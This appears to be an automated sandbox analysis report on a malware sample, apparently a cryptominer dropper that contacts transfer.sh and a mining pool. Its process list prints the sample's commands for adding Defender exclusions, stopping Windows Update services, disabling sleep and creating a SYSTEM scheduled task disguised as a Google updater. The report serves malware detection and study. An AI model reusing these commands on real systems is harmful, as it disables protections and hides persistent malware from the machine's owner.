Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4476 wrote to memory of 4152 N/A C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 4476 wrote to memory of 4152 N/A C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 4476 wrote to memory of 4152 N/A C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 4152 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 4152 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 3264 wrote to memory of 4640 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 3264 wrote to memory of 4640 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 3264 wrote to memory of 4596 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 3264 wrote to memory of 4596 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 3264 wrote to memory of 4600 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 3264 wrote to memory of 4600 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 3264 wrote to memory of 5028 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 3264 wrote to memory of 5028 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 3264 wrote to memory of 1700 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 3264 wrote to memory of 1700 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 3992 wrote to memory of 376 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3992 wrote to memory of 376 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3992 wrote to memory of 2000 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3992 wrote to memory of 2000 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3992 wrote to memory of 4676 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3992 wrote to memory of 4676 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3992 wrote to memory of 2836 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3992 wrote to memory of 2836 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2852 wrote to memory of 4952 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2852 wrote to memory of 4952 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2852 wrote to memory of 3848 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2852 wrote to memory of 3848 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2852 wrote to memory of 908 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2852 wrote to memory of 908 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2852 wrote to memory of 3800 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2852 wrote to memory of 3800 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2852 wrote to memory of 1188 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2852 wrote to memory of 1188 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 1020 wrote to memory of 764 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1020 wrote to memory of 764 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1020 wrote to memory of 4692 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1020 wrote to memory of 4692 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1020 wrote to memory of 3460 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1020 wrote to memory of 3460 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1020 wrote to memory of 4960 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1020 wrote to memory of 4960 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe

"C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe"

C:\Users\Admin\AppData\Local\Temp\mi.exe

"C:\Users\Admin\AppData\Local\Temp\mi.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4476 -ip 4476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4476 -s 1452

C:\Windows\Temp\setup.exe

"C:\Windows\Temp\setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
NL 209.250.248.11:33522 tcp
US 8.8.8.8:53 11.248.250.209.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 153.136.76.144.in-addr.arpa udp
US 8.8.8.8:53 1.202.248.87.in-addr.arpa udp
US 8.8.8.8:53 2.77.109.52.in-addr.arpa udp
US 8.8.8.8:53 stratum-eu.rplant.xyz udp
FR 141.94.192.217:17056 stratum-eu.rplant.xyz tcp
US 8.8.8.8:53 217.192.94.141.in-addr.arpa udp
US 8.8.8.8:53 240.81.21.72.in-addr.arpa udp
US 8.8.8.8:53 123.10.44.20.in-addr.arpa udp

Files

memory/4476-133-0x0000000001B70000-0x0000000001B99000-memory.dmp

memory/4476-134-0x0000000003670000-0x00000000036AF000-memory.dmp

memory/4476-135-0x0000000000400000-0x00000000018CD000-memory.dmp

memory/4476-136-0x0000000074F50000-0x0000000075700000-memory.dmp

memory/4476-137-0x0000000000400000-0x00000000018CD000-memory.dmp

memory/4476-138-0x00000000061C0000-0x00000000061D0000-memory.dmp

memory/4476-139-0x00000000061C0000-0x00000000061D0000-memory.dmp

